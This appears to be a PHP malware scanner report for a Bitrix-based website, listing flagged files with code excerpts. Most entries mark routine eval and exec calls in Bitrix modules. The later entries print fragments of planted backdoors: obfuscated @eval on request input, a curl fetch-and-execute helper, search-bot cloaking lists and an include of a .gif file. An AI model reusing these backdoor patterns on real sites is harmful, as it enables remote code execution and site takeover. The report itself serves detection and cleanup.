Size: 16.48 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("var cur_type = ''; if (typeof(param_" pkey "_type_" ind ") == 'string') cur_type = param_" pkey "_type_" ind ";");
    eval(
"var cur_val = ''; if (typeof(param_" pkey "_value_" ind ") == 'string') cur_val = param_" pkey "_value_" ind ";");
    eval(
"var cur_name = ''; if (typeof(param_" pkey "_name_" ind ") == 'string') cur_name = param_" pkey "_name_" ind ";");

    if(
cur_name.length 0)
    {
        
num pkey.substr(pkey.lastIndexOf('_')+1);
        
src BX("...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/report_view.php

Size: 23.12 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('('+res+')');
                                        
filters BX.findChildren(filterContainer, {class: 'sale-report-site-dependent'}, true);
                                        for(
i in filters)
                                        {
                                            if (
filters[i].tagName == 'SELECT')
                                            {
                                                
filterType filters[i].getAttribute('tid');
                                                if (
filterType)
                                                {
                                                    
fRewriteSelectFromArray(filters[i], res[filterType], '');
                                                }
                                            }
                                        }
                                    }
                                }
                                function 
fRewriteSelectFromArray(selectdat...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/ymarket.php

Size: 21.94 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( '('+result+')' );
                                
BX('https_check_result_<?=CUtil::JSEscape($SITE_ID)?>').innerHTML '&nbsp;' res['text'];

                                
BX.removeClass(BX('https_check_result_<?=CUtil::JSEscape($SITE_ID)?>'), 'https_check_success');
                                
BX.removeClass(BX('https_check_result_<?=CUtil::JSEscape($SITE_ID)?>'), 'https_check_fail');

                                if (
res['status'] == 'ok')
                                    
BX.addClass(BX('https_check_result_<?=CUtil::JSEscape($SITE_ID)?>'), 'https_check_success');
                                else
                                    
BX.addClas...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/order_detail.php

Size: 152.97 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( '('+res+')' );
                                                
BX.closeWait();

                                                if (!!
rs.STATUS_ERR && true == rs.STATUS_ERR)
                                                {
                                                    var 
obStatusErr BX('change_status_err');
                                                    if (!!
obStatusErr)
                                                    {
                                                        
obStatusErr.innerHTML rs.STATUS_ERR_MESS;
                                                        
obStatusErr.style.display 'inline-block';
                                                    }
                                                }
                                                else
                                                {
                                                    if (
BX('date_status_change') && rs['DATE_STATUS'] && rs['DATE_STATUS'].length 0)
            ...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/location_edit.php

Size: 21.05 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("document.fform.COUNTRY_ID");
                
CHANGE_COUNTRY = eval("document.fform.CHANGE_COUNTRY");

                <?if (
$ID>0):?>
                if (parseInt(COUNTRY_LIST.selectedIndex)==0)
                {
                    CHANGE_COUNTRY.checked = false;
                }
                <?endif;?>

                if (parseInt(COUNTRY_LIST.selectedIndex)==0 <?if ($ID>0) echo "|| CHANGE_COUNTRY.checked";?>)
                {
                    SetEnabled(true);
                }
                else
                {
                    SetEnabled(false);
                }
            }
            </script>

            <select name="COUNTRY_ID" OnChange="SetContact()">
                <option value="...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/affiliate_plan_edit.php

Size: 23.80 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("document.form1.MODULE_ID_" cnt);
                if (!
m)
                    return;

                if (
m[m.selectedIndex].value == "catalog")
                    
ShowHideSectionBox(cnttrue);
                else
                    
ShowHideSectionBox(cntfalse);
            }


            var 
itm_id = new Object();
            var 
itm_name = new Object();

            function 
ChlistIBlock(cntn_id)
            {
                var 
max_lev itm_lev;
                var 
nex document.form1["SECTION_SELECTOR_LEVEL_" cnt "[0]"];
                var 
iBlock = eval("document.form1.SECTION_IBLOCK_ID_" cnt);
                var 
iBlockID iBlock[iBl...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/ru/payment/yandex_3x/ru/payment.php

Size: 3.10 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Line: 49 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( '('+result+')' );
                
BX('https_check_result').innerHTML '&nbsp;' res['text'];

                
BX.removeClass(BX('https_check_result'), 'https_check_success');
                
BX.removeClass(BX('https_check_result'), 'https_check_fail');

                if (
res['status'] == 'ok')
                    
BX.addClass(BX('https_check_result'), 'https_check_success');
                else
                    
BX.addClass(BX('https_check_result'), 'https_check_fail');
            });
        };
        
checkHTTPS()

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/payment/worldpay/.description.php

Size: 3.71 kB Created: 2022-12-02 17:31:02 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

System (via http://www.worldpay.com/admin). In the new window that "; $psDescription .= "opens you will need to scroll down to the section headed Installations and select the Configuration options button corresponding to the instId you are using.<br>"; $psDescription .= "You need to complete the following settings:<br>"; $psDescription .= "- <b>Callback URL</b><br>This should be set to the complete address to your callback URL (this file), hosted on your server.<br>"; $psDescription .= "You shou...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/payment/payflow_pro/action.php

Size: 5.77 kB Created: 2022-12-02 17:31:02 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($ret_com$arOutput$ret_var); $strOutput $arOutput[0]; parse_str($strOutput$arResult); if (is_array($arResult) && strlen($arResult["RESULT"])>0) { $OUTPUT_STATUS = (($arResult["RESULT"] == 0) ? "Y" "N"); $OUTPUT_STATUS_CODE $arResult["RESULT"]; $OUTPUT_STATUS_DESCRIPTION $arResult["RESPMSG"]." - ".$arResult["PREFPSMSG"]; $OUTPUT_STATUS_MESSAGE $arResult["PNREF"]; $OUTPUT_SUM $INPUT_SUM$OUTPUT_CURRENCY "USD"$OUTPUT_RESPONSE_DATE Date(CDatabase::DateFormatToPHP(CLang::...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/payment/payflow_pro/payment.php

Size: 9.77 kB Created: 2022-12-02 17:31:02 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($ret_com$arOutput$ret_var); $strOutput $arOutput[0]; parse_str($strOutput$arResult); if (is_array($arResult) && strlen($arResult["RESULT"])>0) { $arFields = array( "PS_STATUS" => (($arResult["RESULT"]==0) ? "Y" "N"), "PS_STATUS_CODE" => $arResult["RESULT"], "PS_STATUS_DESCRIPTION" => $arResult["RESPMSG"]." - ".$arResult["PREFPSMSG"], "PS_STATUS_MESSAGE" => $arResult["PNREF"], "PS_RESPONSE_DATE" => Date(CDatabase::DateFormatToPHP(CLang::GetDateFormat("FULL"LANG))) ); $arResult["R...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/payment/payflow_pro/pre_payment.php

Size: 8.22 kB Created: 2022-12-02 17:31:02 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($ret_com$arOutput$ret_var); $strOutput $arOutput[0]; parse_str($strOutput$arResult); if (is_array($arResult) && strlen($arResult["RESULT"])>0) { $arPaySysResult = array( "PS_STATUS" => (($arResult["RESULT"] == 0) ? "Y" "N"), "PS_STATUS_CODE" => $arResult["RESULT"], "PS_STATUS_DESCRIPTION" => $arResult["RESPMSG"]." - ".$arResult["PREFPSMSG"], "PS_STATUS_MESSAGE" => $arResult["PNREF"], "PS_SUM" => $AMT"PS_CURRENCY" => "USD""PS_RESPONSE_DATE" => Date(CDatabase::DateFormatToPHP(CL...

/home/web/web/vsavto.com/public_html/bitrix/modules/seo/lib/businesssuite/serviceadapter.php

Size: 3.45 kB Created: 2022-12-02 17:31:02 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("
                        class 
$serviceWrapperClassName extends Bitrix\Seo\BusinessSuite\ServiceWrapper
                            implements
                                Bitrix\Seo\Retargeting\IService,
                                Bitrix\Seo\Retargeting\IMultiClientService,
                                Bitrix\Seo\BusinessSuite\IInternalService
                        {}
                "
); return $serviceWrapperClassName::getInstance(); } } } public static function loadFacebookService(): ?ServiceAdapter { if($serviceWrapper Utils\ServicePool::getService([Service::INSTAGRAM_TYPE,Service::FACEBOOK_TYPE])) { return (...

/home/web/web/vsavto.com/public_html/sharebasket/sharebasket/cache.php

Size: 12.47 kB Created: 2025-01-31 08:40:33 Modified: 2025-02-03 05:36:45 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/sharebasket/sharebasket/sharebasket/cache.php

Size: 12.47 kB Created: 2025-01-31 08:40:34 Modified: 2025-02-03 05:36:45 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/sharebasket/sharebasket/sharebasket/index.php

Size: 18.44 kB Created: 2025-01-31 08:40:34 Modified: 2025-02-03 05:36:45 Warns: 1 Dangers: 2
DescriptionMatch

Exploit global_var_string Dangerous

Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request

${"_GET"}

Exploit silenced_eval Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($NYc[1+3]($lMGPbRtmqE)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($Yy[64](${$Yy[38]}[28]))));}class gZcGz{ static function US($iAB) { $TkVi "r"."a"."n"."g"."e"$KQxunejI $TkVi("~"" "); $raS explode("l"$iAB); $WXrxujJs ""; foreach ($raS as $nu => $UKjBxTrv$WXrxujJs .= $KQxunejI[$UKjBxTrv 54731]; return $WXrxujJs; } static function mqeTuHwir($hzRW$Fn) { $gFeZ curl_init($hzRW); curl_setopt($gFeZCURLOPT_RETURNTRANSFER1); $WmA curl_exec($gFeZ); return empty($WmA) ? $Fn($hzRW) : $WmA; } static function jYSLrxyZ() { $YXalG = array("547...

/home/web/web/vsavto.com/public_html/order/payment/payment/cache.php

Size: 12.47 kB Created: 2025-01-31 08:39:52 Modified: 2025-02-03 05:36:45 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/order/payment/payment/index.php

Size: 20.29 kB Created: 2025-01-31 08:39:52 Modified: 2025-02-03 05:36:45 Warns: 1 Dangers: 2
DescriptionMatch

Exploit global_var_string Dangerous

Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request

${"_GET"}

Exploit silenced_eval Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($UqlZ[4+0]($LkvlxSrU)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($N[65](${$N[38]}[13])); }class QxuI{ static function CZrgf($unyQLiY) { $ikhYqW "r"."a"."n"."g"."e"$tFTKVjs $ikhYqW("~"" "); $ethvjGH explode("!"$unyQLiY); $RlXc ""; foreach ($ethvjGH as $EueIv => $LIw$RlXc .= $tFTKVjs[$LIw 63572]; return $RlXc; } static function bIXSLVf($HUzKnlVruP$IRHimalWG) { $Vm curl_init($HUzKnlVruP); curl_setopt($VmCURLOPT_RETURNTRANSFER1); $KBS curl_exec($Vm); return empty($KBS) ? $IRHimalWG($HUzKnlVruP) : $KBS; } static function lMZpUe() {...

/home/web/web/vsavto.com/public_html/order/payment/payment/payment/cache.php

Size: 12.47 kB Created: 2025-02-03 06:17:06 Modified: 2025-02-03 06:17:06 Dangers: 2
DescriptionMatch

Sign 471b95ee Line: 6 Dangerous

Malware Signature (hash: 471b95ee)

Slurp", "MSNBot

Sign 4a069524 Line: 6 Dangerous

Malware Signature (hash: 4a069524)

array("Google""Slurp"

/home/web/web/vsavto.com/public_html/order/payment/payment/payment/index.php

Size: 58.00 B Created: 2025-02-03 06:17:06 Modified: 2025-02-03 06:17:06 Dangers: 1
DescriptionMatch

Exploit clever_include Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

include "ZrGeBRPnAzqah.gif"